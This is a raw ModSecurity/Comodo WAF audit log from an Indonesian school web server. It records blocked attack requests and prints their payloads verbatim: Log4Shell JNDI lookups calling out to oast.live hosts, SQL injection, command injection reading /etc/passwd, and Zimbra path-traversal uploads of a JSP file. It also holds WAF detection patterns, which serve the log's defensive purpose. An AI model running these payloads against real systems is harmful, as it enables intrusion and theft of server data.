Content-Type: application/soap+xml;charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 164641925 --74ed5e0a-C-- HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --74ed5e0a-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --74ed5e0a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748475642782777 3170 (- - -) Stopwatch2: 1748475642782777 3170; combined=2081, p1=443, p2=1566, p3=22, p4=23, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74ed5e0a-Z-- --018af153-A-- [29/May/2025:06:40:57 +0700] aDefCcX5pbyFXv2T3ipaxgAAAMU 103.236.140.4 35958 103.236.140.4 8181 --018af153-B-- GET /?x=${jndi:ldap://${:-712}${:-896}.${hostName}.uri.d0rjil9gpeoh536h8tf04u9hj3wmz3gzb.oast.live/a} HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164641943 --018af153-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --018af153-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748475657766079 4759 (- - -) Stopwatch2: 1748475657766079 4759; combined=3313, p1=434, p2=2850, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --018af153-Z-- --c8201740-A-- [29/May/2025:06:40:58 +0700] aDefCsX5pbyFXv2T3ipaxwAAAMk 103.236.140.4 35958 103.236.140.4 8181 --c8201740-B-- GET / HTTP/1.1 Referer: ${jndi:ldap://${:-712}${:-896}.${hostName}.referer.d0rjil9gpeoh536h8tf0i8i31q9mwzsmk.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://${:-712}${:-896}.${hostName}.useragent.d0rjil9gpeoh536h8tf059cn5jpggzn83.oast.live} Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-712}${:-896}.${hostName}.accept.d0rjil9gpeoh536h8tf0iafoogs7bxk9r.oast.live} Accept-Language: ${jndi:ldap://${:-712}${:-896}.${hostName}.acceptlanguage.d0rjil9gpeoh536h8tf0ufrsy7xj6jeu8.oast.live} Access-Control-Request-Headers: ${jndi:ldap://${:-712}${:-896}.${hostName}.accesscontrolrequestheaders.d0rjil9gpeoh536h8tf0a5kedpcc7bqfj.oast.live} Access-Control-Request-Method: ${jndi:ldap://${:-712}${:-896}.${hostName}.accesscontrolrequestmethod.d0rjil9gpeoh536h8tf0fwhxg69i5o5mh.oast.live} Authentication: Bearer ${jndi:ldap://${:-712}${:-896}.${hostName}.authenticationbearer.d0rjil9gpeoh536h8tf04n64pj8h1p8u6.oast.live} Location: ${jndi:ldap://${:-712}${:-896}.${hostName}.location.d0rjil9gpeoh536h8tf09yttpwex7phkh.oast.live} Origin: ${jndi:ldap://${:-712}${:-896}.${hostName}.origin.d0rjil9gpeoh536h8tf0friz68spd97ju.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://${:-712}${:-896}.${hostName}.upgradeinsecurerequests.d0rjil9gpeoh536h8tf0snu8m9qxg9j1s.oast.live} X-Api-Version: ${jndi:ldap://${:-712}${:-896}.${hostName}.xapiversion.d0rjil9gpeoh536h8tf0xzm1cgwocc6po.oast.live} X-CSRF-Token: ${jndi:ldap://${:-712}${:-896}.${hostName}.xcsrftoken.d0rjil9gpeoh536h8tf0drjs1zy5qg9dq.oast.live} X-Druid-Comment: ${jndi:ldap://${:-712}${:-896}.${hostName}.xdruidcomment.d0rjil9gpeoh536h8tf09ta1jb77mfc9e.oast.live} X-Origin: ${jndi:ldap://${:-712}${:-896}.${hostName}.xorigin.d0rjil9gpeoh536h8tf0btafyi9c1o7ah.oast.live} Cookie: ${jndi:ldap://${:-712}${:-896}.${hostName}.cookiename.d0rjil9gpeoh536h8tf0aihwdnkp74r5s.oast.live}=${jndi:ldap://${:-712}${:-896}.${hostName}.cookievalue.d0rjil9gpeoh536h8tf0brumntnzkg1jy.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151617674 --c8201740-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c8201740-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748475658802565 4916 (- - -) Stopwatch2: 1748475658802565 4916; combined=3615, p1=391, p2=3184, p3=0, p4=0, p5=40, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8201740-Z-- --a759726a-A-- [29/May/2025:06:46:43 +0700] aDegY8X5pbyFXv2T3ipbCQAAAMI 103.236.140.4 36176 103.236.140.4 8181 --a759726a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.216 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3730.0 Safari/537.36 Accept-Charset: utf-8 --a759726a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a759726a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748476003919815 748 (- - -) Stopwatch2: 1748476003919815 748; combined=295, p1=255, p2=0, p3=0, p4=0, p5=39, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a759726a-Z-- --75773c52-A-- [29/May/2025:07:27:52 +0700] aDeqCH1Ye2lUDKzW1LvHEQAAAAk 103.236.140.4 37530 103.236.140.4 8181 --75773c52-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.90.239.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.90.239.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --75773c52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75773c52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748478472855624 2935 (- - -) Stopwatch2: 1748478472855624 2935; combined=1533, p1=477, p2=1010, p3=0, p4=0, p5=45, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75773c52-Z-- --e945e156-A-- [29/May/2025:07:29:52 +0700] aDeqgH1Ye2lUDKzW1LvHHwAAAAg 103.236.140.4 37602 103.236.140.4 8181 --e945e156-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.235.252.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.235.252.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e945e156-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e945e156-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748478592042382 3337 (- - -) Stopwatch2: 1748478592042382 3337; combined=1411, p1=484, p2=894, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e945e156-Z-- --f583234b-A-- [29/May/2025:07:41:21 +0700] aDetMf4vV4CoZ0MKLMPhBQAAAIQ 103.236.140.4 39676 103.236.140.4 8181 --f583234b-B-- GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (CentOS; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 163061205 --f583234b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f583234b-E-- --f583234b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 0 union select sleep(7) found within MATCHED_VAR: 0 union select sleep(7) "] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748479281419873 3349 (- - -) Stopwatch2: 1748479281419873 3349; combined=1709, p1=445, p2=1234, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f583234b-Z-- --401a4e34-A-- [29/May/2025:07:41:22 +0700] aDetMv4vV4CoZ0MKLMPhCgAAAJY 103.236.140.4 39694 103.236.140.4 8181 --401a4e34-B-- POST /conf_mail.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 75 User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/103.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 167904435 --401a4e34-C-- mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M --401a4e34-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --401a4e34-E-- --401a4e34-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /conf_mail.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748479282424354 1705 (- - -) Stopwatch2: 1748479282424354 1705; combined=506, p1=355, p2=122, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --401a4e34-Z-- --1c04ba50-A-- [29/May/2025:07:41:24 +0700] aDetNGMaQtTb69S13pj1UAAAAEA 103.236.140.4 39724 103.236.140.4 8181 --1c04ba50-B-- GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1 Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d0rjil9gpeoh536h8tf0hks4mbnkjk77w.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0rjil9gpeoh536h8tf0tkc64ztkr7nx8.oast.live} Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.d0rjil9gpeoh536h8tf0ocxyywumy4dzd.oast.live} Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.d0rjil9gpeoh536h8tf0ph3gijt9temor.oast.live} Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.d0rjil9gpeoh536h8tf0no9ggj3e8ux4x.oast.live} Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.d0rjil9gpeoh536h8tf0m3xcq9wzg5p9x.oast.live} Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.d0rjil9gpeoh536h8tf0askrebn3ak4ix.oast.live} Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.d0rjil9gpeoh536h8tf0tnu6map7ibmso.oast.live} Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.d0rjil9gpeoh536h8tf0nz7sibmik4tch.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.d0rjil9gpeoh536h8tf0fzxrbiktp3gk1.oast.live} X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.d0rjil9gpeoh536h8tf0s1b786o6373w7.oast.live} X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.d0rjil9gpeoh536h8tf0dtqp53tn1cp3g.oast.live} X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.d0rjil9gpeoh536h8tf0w9ec6dcub3b71.oast.live} X-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.d0rjil9gpeoh536h8tf0hq3cxursap9z4.oast.live} Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.d0rjil9gpeoh536h8tf0rjrrqiokifho3.oast.live}=${jndi:ldap://${hostName}.cookievalue.d0rjil9gpeoh536h8tf0d7579urnt4sg6.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167904447 --1c04ba50-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1c04ba50-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748479284420662 5916 (- - -) Stopwatch2: 1748479284420662 5916; combined=4267, p1=447, p2=3772, p3=0, p4=0, p5=48, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c04ba50-Z-- --8b67f279-A-- [29/May/2025:07:41:25 +0700] aDetNf4vV4CoZ0MKLMPhFQAAAIY 103.236.140.4 39746 103.236.140.4 8181 --8b67f279-B-- POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 39 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: sid=foo X-Varnish: 167904456 --8b67f279-C-- sid=foo&hhook=exec&text=cat+/etc/passwd --8b67f279-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b67f279-E-- --8b67f279-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:text. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:text: cat /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748479285644810 2999 (- - -) Stopwatch2: 1748479285644810 2999; combined=1839, p1=513, p2=1292, p3=0, p4=0, p5=34, sr=78, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b67f279-Z-- --e05f1124-A-- [29/May/2025:07:48:12 +0700] aDeuzP4vV4CoZ0MKLMPihAAAAI0 103.236.140.4 44478 103.236.140.4 8181 --e05f1124-B-- POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 585 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 153683054 --e05f1124-C-- ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````&UP-%:3!MD>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --1ea3d83c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ea3d83c-E-- --1ea3d83c-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748483563805749 5359 (- - -) Stopwatch2: 1748483563805749 5359; combined=3870, p1=537, p2=3291, p3=0, p4=0, p5=42, sr=85, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ea3d83c-Z-- --090b6b1a-A-- [29/May/2025:08:52:43 +0700] aDe96_4vV4CoZ0MKLMPkhAAAAIU 103.236.140.4 57010 103.236.140.4 8181 --090b6b1a-B-- POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 716 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Safari/537.36 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 165249969 --090b6b1a-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --090b6b1a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --090b6b1a-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data 